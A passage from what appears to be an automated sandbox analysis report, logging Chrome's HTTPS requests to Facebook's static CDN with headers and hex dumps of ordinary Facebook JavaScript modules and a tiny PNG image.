                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: w7W3bXyTeVnT1AG/yg7RXSETnreb2E5vQHXULlzwXltOUq2X61YSlCH7plE4gNUdK5oaTCj6Cab8Z74mHFiU2w==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 82019
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 4e 65 63 74 61 72 22 2c 5b 22 45 6e 76 22 2c 22 67 65 74 43 6f 6e 74 65 78 74 75 61 6c 50 61 72 65 6e 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 76 61 72 20 67 3b 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 61 2e 6e 63 74 72 7c 7c 28 61 2e 6e 63 74 72 3d 7b 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 69 66 28 28 67 7c 7c 28 67 3d 62 28 22 45 6e 76 22 29 29 29 2e 6d 6f 64 75 6c 65 7c 7c 21 61 29 72 65 74 75 72 6e 28 67 7c 7c 28 67 3d 62 28 22 45 6e 76 22 29 29 29 2e 6d 6f 64 75 6c 65 3b 76 61 72 20 63 3d 7b 66 62 70 61 67 65 5f 66 61 6e 5f 63 6f 6e 66 69 72 6d 3a 21 30 2c 70 68 6f 74 6f 73 5f 73 6e 6f 77 6c 69 66 74 3a 21 30 7d 2c 64 3b 77 68 69
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("Nectar",["Env","getContextualParent"],(function(a,b,c,d,e,f){var g;function h(a){a.nctr||(a.nctr={})}function i(a){if((g||(g=b("Env"))).module||!a)return(g||(g=b("Env"))).module;var c={fbpage_fan_confirm:!0,photos_snowlift:!0},d;whi
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 39 31 3b 74 68 69 73 2e 68 5b 31 5d 2b 3d 64 3b 64 3d 74 68 69 73 2e 68 5b 31 5d 3e 3e 3e 31 33 3b 74 68 69 73 2e 68 5b 31 5d 26 3d 38 31 39 31 3b 74 68 69 73 2e 68 5b 32 5d 2b 3d 64 3b 63 5b 30 5d 3d 74 68 69 73 2e 68 5b 30 5d 2b 35 3b 64 3d 63 5b 30 5d 3e 3e 3e 31 33 3b 63 5b 30 5d 26 3d 38 31 39 31 3b 66 6f 72 28 65 3d 31 3b 65 3c 31 30 3b 65 2b 2b 29 63 5b 65 5d 3d 74 68 69 73 2e 68 5b 65 5d 2b 64 2c 64 3d 63 5b 65 5d 3e 3e 3e 31 33 2c 63 5b 65 5d 26 3d 38 31 39 31 3b 63 5b 39 5d 2d 3d 31 3c 3c 31 33 3b 64 3d 28 64 5e 31 29 2d 31 3b 66 6f 72 28 65 3d 30 3b 65 3c 31 30 3b 65 2b 2b 29 63 5b 65 5d 26 3d 64 3b 64 3d 7e 64 3b 66 6f 72 28 65 3d 30 3b 65 3c 31 30 3b 65 2b 2b 29 74 68 69 73 2e 68 5b 65 5d 3d 74 68 69 73 2e 68 5b 65 5d 26 64 7c 63 5b 65 5d 3b
                                                                                                                                                                                                                                Data Ascii: 91;this.h[1]+=d;d=this.h[1]>>>13;this.h[1]&=8191;this.h[2]+=d;c[0]=this.h[0]+5;d=c[0]>>>13;c[0]&=8191;for(e=1;e<10;e++)c[e]=this.h[e]+d,d=c[e]>>>13,c[e]&=8191;c[9]-=1<<13;d=(d^1)-1;for(e=0;e<10;e++)c[e]&=d;d=~d;for(e=0;e<10;e++)this.h[e]=this.h[e]&d|c[e];
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 74 72 65 61 6d 5f 73 61 6c 73 61 32 30 5f 78 6f 72 3a 77 2c 63 72 79 70 74 6f 5f 73 74 72 65 61 6d 5f 73 61 6c 73 61 32 30 3a 78 2c 63 72 79 70 74 6f 5f 6f 6e 65 74 69 6d 65 61 75 74 68 3a 42 2c 63 72 79 70 74 6f 5f 6f 6e 65 74 69 6d 65 61 75 74 68 5f 76 65 72 69 66 79 3a 43 2c 63 72 79 70 74 6f 5f 76 65 72 69 66 79 5f 31 36 3a 70 2c 63 72 79 70 74 6f 5f 76 65 72 69 66 79 5f 33 32 3a 71 2c 63 72 79 70 74 6f 5f 73 65 63 72 65 74 62 6f 78 3a 44 2c 63 72 79 70 74 6f 5f 73 65 63 72 65 74 62 6f 78 5f 6f 70 65 6e 3a 45 2c 63 72 79 70 74 6f 5f 73 63 61 6c 61 72 6d 75 6c 74 3a 53 2c 63 72 79 70 74 6f 5f 73 63 61 6c 61 72 6d 75 6c 74 5f 62 61 73 65 3a 54 2c 63 72 79 70 74 6f 5f 62 6f 78 5f 62 65 66 6f 72 65 6e 6d 3a 56 2c 63 72 79 70 74 6f 5f 62 6f 78 5f 61 66 74
                                                                                                                                                                                                                                Data Ascii: tream_salsa20_xor:w,crypto_stream_salsa20:x,crypto_onetimeauth:B,crypto_onetimeauth_verify:C,crypto_verify_16:p,crypto_verify_32:q,crypto_secretbox:D,crypto_secretbox_open:E,crypto_scalarmult:S,crypto_scalarmult_base:T,crypto_box_beforenm:V,crypto_box_aft
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC16384INData Raw: 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 6d 6f 7a 46 75 6c 6c 53 63 72 65 65 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 6d 73 46 75 6c 6c 73 63 72 65 65 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 66 75 6c 6c 73 63 72 65 65 6e 45 6e 61 62 6c 65 64 3b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 62 7c 7c 61 2e 77 65 62 6b 69 74 43 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 6d 6f 7a 43 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 6d 73 45 78 69 74 46 75 6c 6c 73 63 72 65 65 6e 7c 7c 61 2e 63 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 65 78 69 74 46 75 6c 6c 53 63 72 65 65 6e 29 7d 3b 72 65 74 75 72 6e 20 62 7d 28 63 28 22 6d 69 78 69 6e 22 29 28 63 28 22 41 72 62 69 74 65 72 4d 69 78 69 6e 22 29 29 29 3b 62 3d 6e 65 77 20 61 28 29 3b 65
                                                                                                                                                                                                                                Data Ascii: nEnabled||a.mozFullScreenEnabled||a.msFullscreenEnabled||a.fullscreenEnabled;return Boolean(b||a.webkitCancelFullScreen||a.mozCancelFullScreen||a.msExitFullscreen||a.cancelFullScreen||a.exitFullScreen)};return b}(c("mixin")(c("ArbiterMixin")));b=new a();e
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1500INData Raw: 62 29 7b 74 68 69 73 2e 24 31 3d 61 2c 74 68 69 73 2e 24 32 3d 62 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 55 52 49 42 75 69 6c 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2c 64 3d 6e 65 77 28 63 28 22 58 43 6f 6e 74 72 6f 6c 6c 65 72 55 52 49 42 75 69 6c 64 65 72 22 29 29 28 74 68 69 73 2e 24 31 2c 74 68 69 73 2e 24 32 29 3b 69 66 28 61 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 67 65 74 52 65 71 75 65 73 74 28 61 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 24 32 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 62 2e 24 32 5b 61 5d 2c 66 3d 22 22 3b 21 63 2e 72 65 71 75 69 72 65 64 26 26 21 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61
                                                                                                                                                                                                                                Data Ascii: b){this.$1=a,this.$2=b}var b=a.prototype;b.getURIBuilder=function(a){var b=this,d=new(c("XControllerURIBuilder"))(this.$1,this.$2);if(a){var e=this.getRequest(a);Object.keys(this.$2).forEach(function(a){var c=b.$2[a],f="";!c.required&&!Object.prototype.ha
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC15495INData Raw: 22 52 65 6c 6f 61 64 50 61 67 65 22 29 2e 6e 6f 77 28 29 7d 29 2e 73 65 6e 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 5c 78 61 30 22 2c 22 67 22 29 2c 22 26 6e 62 73 70 3b 22 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 26 6e 62 73 70 3b 22 2c 22 67 22 29 2c 22 5c 78 61 30 22 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 61 29 7b 6e 65 77 28 63 28 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 29 29 28 29 2e 73 65 74 55 52 49 28 69 29 2e 73 65 74 44 61 74 61 28 7b 72 6d 6f 64 65 3a 61 7d 29 2e 73 65 74 48 61 6e 64 6c 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 52 65 6c 6f 61
                                                                                                                                                                                                                                Data Ascii: "ReloadPage").now()}).send()}function b(a){return a.replace(new RegExp("\xa0","g"),"&nbsp;")}function e(a){return a.replace(new RegExp("&nbsp;","g"),"\xa0")}function f(a){new(c("AsyncRequest"))().setURI(i).setData({rmode:a}).setHandler(function(){d("Reloa


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                51192.168.2.449797157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC374OUTGET /rsrc.php/v3/ys/r/4zS6aBDBtHT.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: 7SY8y7UBL6gkDv/oCq1cwQ==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 09:58:34 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: NHEy/Ywz3qCg2/yiac1LG/3LfG9APZslekPzLaoh0TF5JdOm2yOYhmxXsM6Xr5gKXUiHAd6wx7kUlrFYnBqBgA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3410, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 9204
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC9203INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 22 2c 5b 22 63 72 3a 37 33 38 33 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 63 72 3a 37 33 38 33 22 29 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 45 76 65 6e 74 45 6d 69 74 74 65 72 57 69 74 68 56 61 6c 69 64 61 74 69 6f 6e 22 2c 5b 22 42 61 73 65 45 76 65 6e 74 45 6d 69 74 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 2c 63 29 7b 76 61
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("Banzai",["cr:7383"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:7383")}),98);__d("EventEmitterWithValidation",["BaseEventEmitter"],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){va


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                52192.168.2.449803157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC375OUTGET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: OcEdZWIg79UvSWVADRSQCg==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 06:49:22 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: mt4yu4rn9RgdICtFEITOprhkXG/DUQKZF6WNE/bk/dJVHZ8N+3oVEiojXQLhxWSulEkWX/ZHfJyN+uOs8WLX7Q==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 95
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 89
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC94INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 0a a0 33 31 78 00 00 00 0a 49 44 41 54 08 1d 63 60 00 00 00 02 00 01 cf c8 35 e5 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDR%VPLTEz=tRNS31xIDATc`5IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                53192.168.2.449802157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC581OUTGET /rsrc.php/v3/yr/r/jJPH6iCu1HH.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: UCXVUk0oqmh5pfZQTG8VQA==
                                                                                                                                                                                                                                Expires: Tue, 23 Sep 2025 18:22:43 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: tH14bLqq+U8KwPVaJgGGo4jVWt5rdc0aQKIij+K8naVo8Eg9IpN0hgqGEFcTnisaI6pm1Rzdwtpw3oynpuyuRQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:22 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 1854
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1853INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 53 75 62 73 63 72 69 70 74 69 6f 6e 73 48 61 6e 64 6c 65 72 22 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 6d 6f 76 65 7c 7c 61 2e 72 65 73 65 74 7c 7c 61 2e 75 6e 73 75 62 73 63 72 69 62 65 7c 7c 61 2e 63 61 6e 63 65 6c 7c 7c 61 2e 64 69 73 70 6f 73 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 61 29 7b 69 28 61 29 2e 63 61 6c 6c 28 61 29 7d 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 24 31 3d 5b 5d 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("SubscriptionsHandler",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function i(a){return a.remove||a.reset||a.unsubscribe||a.cancel||a.dispose}function j(a){i(a).call(a)}a=function(){function a(){this.$1=[]}var b=a.prototype


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                54192.168.2.449801157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC581OUTGET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:22 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: +0ZQ6CpaMkkPWx1LhVlM1w==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 20:39:53 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
